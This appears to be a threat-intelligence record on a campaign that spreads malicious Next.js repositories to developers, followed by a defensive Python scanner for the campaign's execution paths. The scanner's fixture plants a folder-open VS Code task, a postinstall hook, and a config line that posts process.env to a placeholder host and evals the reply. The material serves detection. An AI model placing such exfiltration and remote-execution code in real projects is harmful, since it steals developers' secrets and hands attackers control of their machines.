Developer-targeting campaign using malicious Next.js repositories
Essential information
- Published: 24/02/2026 21:29
- Modified: 24/02/2026 21:54
- Tags: 2026-02-24, command and control, developer-targeting, environment variable exfiltration, javascript, next.js, node.js, remote code execution, visual studio code
- Related entities: 4 observables, 18 techniques (MITRE), 1 others
Description
A coordinated campaign is targeting developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attack uses multiple entry points that lead to runtime retrieval and local execution of attacker-controlled JavaScript, transitioning into staged command-and-control. The campaign employs three main execution paths: Visual Studio Code workspace automation, build-time execution during application development, and server startup execution via environment variable exfiltration and dynamic remote code execution. The attack chain includes a Stage 1 C2 beacon for registration and a Stage 2 C2 controller for persistent tasking. This sophisticated approach allows attackers to blend into routine developer workflows, increasing the likelihood of code execution and potentially compromising high-value assets such as source code, environment secrets, and access to build or cloud resources.
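As an added, defender-side example (not part of this record or of the campaign's observables), the following Python heuristic audits a cloned repository for the three execution paths named in the description: a VS Code task configured to run on folder open, npm lifecycle hooks that fire during install or build, and source files that serialize `process.env` or evaluate fetched text next to a network call. The fixture repository, regex patterns and finding names are constructed assumptions for illustration; a hit needs manual review.

```python
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle hooks that run automatically during install/build/dev (assumed list).
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prebuild", "predev", "prestart"}
ENV_SERIALIZE = re.compile(r"JSON\.stringify\(\s*process\.env\s*\)")
DYNAMIC_EVAL = re.compile(r"\b(eval|new\s+Function|vm\.runInThisContext)\s*\(")
NETWORK_CALL = re.compile(r"\b(fetch|axios|https?\.(get|request))\s*[.(]")
SOURCE_EXT = {".js", ".mjs", ".cjs", ".ts"}

def audit_repo(root):
    """Return (finding, path) tuples for the heuristics above; heuristics only."""
    root = Path(root)
    findings = []
    tasks = root / ".vscode" / "tasks.json"
    if tasks.is_file():
        # Real tasks.json may be JSONC (comments); strip them before parsing in production.
        for task in json.loads(tasks.read_text()).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append(("vscode_task_runs_on_folder_open", str(tasks)))
    pkg = root / "package.json"
    if pkg.is_file():
        for hook in json.loads(pkg.read_text()).get("scripts", {}):
            if hook in LIFECYCLE_HOOKS:
                findings.append((f"npm_lifecycle_hook:{hook}", str(pkg)))
    for path in root.rglob("*"):
        if path.suffix not in SOURCE_EXT or "node_modules" in path.parts:
            continue
        src = path.read_text(errors="ignore")
        if NETWORK_CALL.search(src) and ENV_SERIALIZE.search(src):
            findings.append(("env_serialized_near_network_call", str(path)))
        if NETWORK_CALL.search(src) and DYNAMIC_EVAL.search(src):
            findings.append(("dynamic_eval_near_network_call", str(path)))
    return findings

def build_sample_repo():
    """Constructed fixture, not a real repository: one hit per execution path."""
    root = Path(tempfile.mkdtemp())
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(json.dumps({"version": "2.0.0", "tasks": [
        {"label": "setup", "type": "shell", "command": "node setup.js",
         "runOptions": {"runOn": "folderOpen"}}]}))
    (root / "package.json").write_text(json.dumps(
        {"name": "assessment", "scripts": {"dev": "next dev", "postinstall": "node setup.js"}}))
    (root / "next.config.js").write_text(
        "async function init() {\n"
        "  const r = await fetch('https://example.invalid/', {method: 'POST', body: JSON.stringify(process.env)});\n"
        "  eval(await r.text());\n}\nmodule.exports = {};\n")
    return root

if __name__ == "__main__":
    for finding, path in audit_repo(build_sample_repo()):
        print(finding, path)
```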